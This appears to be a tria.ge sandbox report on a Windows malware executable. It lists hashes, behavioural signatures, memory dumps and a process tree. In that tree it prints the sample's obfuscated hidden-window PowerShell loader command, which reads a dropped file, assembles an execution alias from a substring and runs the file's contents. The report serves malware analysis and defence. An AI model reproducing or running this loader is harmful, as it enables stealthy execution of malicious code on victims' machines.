Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

e25d6621a3...4e.exe

windows7-x64

7

e25d6621a3...4e.exe

windows10-2004-x64

7

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

rigsombuds...ed.ps1

windows7-x64

8

rigsombuds...ed.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240319-en
  • resource tags

    arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
  • submitted
    17/04/2024, 14:19 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e25d6621a38cc9d1dd2428d1886a5080ceec742e8c22fe754e31f6d81eaad44e.exe

  • Size

    574KB

  • MD5

    bae2b5f2ba2e3976d19f78cd57589b43

  • SHA1

    c8cbfb695d01b52a83790146fa2ff89de37447ad

  • SHA256

    e25d6621a38cc9d1dd2428d1886a5080ceec742e8c22fe754e31f6d81eaad44e

  • SHA512

    fbaf47cfac100602fbfdf7bb3d29261c822ef5bfee8f4931ac2f6310339734ca13aadd2fb51f7f36ddc54daf59591723c69daf1eea54d71203ad3608046b70e8

  • SSDEEP

    12288:U1JKwATSHsf9/erPv2OzvwvtV9Tj20z168E7rg3ONKUHOI:UhATSMV/eL+OzGTjxzk8QOyHL

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e25d6621a38cc9d1dd2428d1886a5080ceec742e8c22fe754e31f6d81eaad44e.exe
    "C:\Users\Admin\AppData\Local\Temp\e25d6621a38cc9d1dd2428d1886a5080ceec742e8c22fe754e31f6d81eaad44e.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Caenostylic=Get-Content 'C:\Users\Admin\AppData\Roaming\kolossens\livrente\markedsfringsomkostnings\rigsombudsmndenes\Vildspors\Tjenestefries\Abrased.Wig';$Benraden=$Caenostylic.SubString(44385,3);.$Benraden($Caenostylic)"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2588

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\nsd2F7A.tmp\nsExec.dll
    Filesize

    6KB

    MD5

    293165db1e46070410b4209519e67494

    SHA1

    777b96a4f74b6c34d43a4e7c7e656757d1c97f01

    SHA256

    49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

    SHA512

    97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

    Download Submit

  • memory/2588-22-0x0000000073E70000-0x000000007441B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2588-23-0x0000000073E70000-0x000000007441B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2588-24-0x0000000002200000-0x0000000002240000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2588-25-0x0000000002200000-0x0000000002240000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2588-26-0x0000000002200000-0x0000000002240000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2588-27-0x0000000073E70000-0x000000007441B000-memory.dmp

    Filesize

    5.7MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.